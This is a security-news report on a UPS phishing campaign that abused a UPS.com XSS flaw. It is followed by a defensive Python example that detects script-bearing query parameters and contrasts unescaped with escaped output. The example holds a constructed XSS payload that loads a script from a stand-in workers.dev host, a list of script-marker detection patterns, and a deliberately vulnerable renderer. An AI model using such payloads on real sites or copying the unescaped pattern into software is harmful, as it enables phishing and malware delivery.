Phishing campaign uses UPS.com XSS vuln to distribute malware
Security News, August 2021
A clever UPS phishing campaign utilized an XSS vulnerability in UPS.com to push fake and malicious 'Invoice' Word documents.
The phishing scam was first discovered by security researcher Daniel Gallagher and pretended to be an email from UPS stating that a package had an "Exception" and needed to be picked up by the customer.
The base64 string contains a comment from the threat actor, who helpfully explains that it is used to make the URL longer to hide an XSS exploit query parameter appended to the end of the URL: "1 jU57 N33d 70 m4K3 7h15 URL 4 l177l3 L0n93r 70 H1D3 n3x7 qU3rY P4R4M, y0u 4LR34Dy Kn0w WhY ;)". This comment is interesting, as it is not common for threat actors to explain why a URL is constructed a certain way for a phishing attack.
The Cloudflare worker script injected by the XSS vulnerability will cause the UPS website to display a downloading page, as shown below.
This phishing campaign is so clever because a user visiting the URL will see a legitimate ups.com URL prompting a download of an invoice.
While the email sender clearly showed a suspicious domain, the XSS vulnerability made the URL and download page appear to come legitimately from UPS, so many people would have fallen for this scam.
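The two sides of the technique described above, as an added example that is not from the article or from UPS: a check that inspects every query parameter of a URL so a long opaque parameter cannot push a script-bearing one out of view, beside the unescaped reflection pattern a reflected XSS bug relies on and its escaped counterpart. The URL, parameter names, padding, and `example.workers.dev` host are constructed for illustration, not the campaign's real values.

```python
import html
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample URL in the style of the campaign: a long opaque
# parameter (standing in for the base64 padding) precedes a parameter
# that carries a script tag pointing at an external worker script.
PADDING = "QQ" * 120
SAMPLE_URL = (
    "https://www.ups.com/track?loc=en_US&tracknum=" + PADDING
    + "&cb=%3Cscript%20src%3D%22https%3A%2F%2Fexample.workers.dev%2Fx.js%22%3E%3C%2Fscript%3E"
)

# Illustrative markers for HTML/script content inside a query value.
SCRIPT_MARKERS = ("<script", "javascript:", "onerror=", "onload=", "<img", "<svg")


def suspicious_params(url: str) -> list[tuple[str, str]]:
    """Return (name, decoded value) for query parameters containing script
    markers. parse_qsl already percent-decodes each value; a second unquote
    catches double-encoded payloads. Every parameter is inspected, so a long
    value earlier in the query does not hide a later one."""
    found = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        decoded = unquote(value)
        if any(marker in decoded.lower() for marker in SCRIPT_MARKERS):
            found.append((name, decoded))
    return found


def render_vulnerable(param: str) -> str:
    """Reflects a query parameter into the page without encoding: the
    pattern that lets attacker-controlled markup execute on a trusted origin."""
    return f"<p>Results for: {param}</p>"


def render_safe(param: str) -> str:
    """Same page with the parameter HTML-escaped, so markup is shown as text
    and never parsed as a tag or attribute."""
    return f"<p>Results for: {html.escape(param, quote=True)}</p>"


if __name__ == "__main__":
    for name, value in suspicious_params(SAMPLE_URL):
        print(f"suspicious parameter {name!r}: {value}")
    payload = suspicious_params(SAMPLE_URL)[0][1]
    print("vulnerable:", render_vulnerable(payload))
    print("safe:      ", render_safe(payload))
```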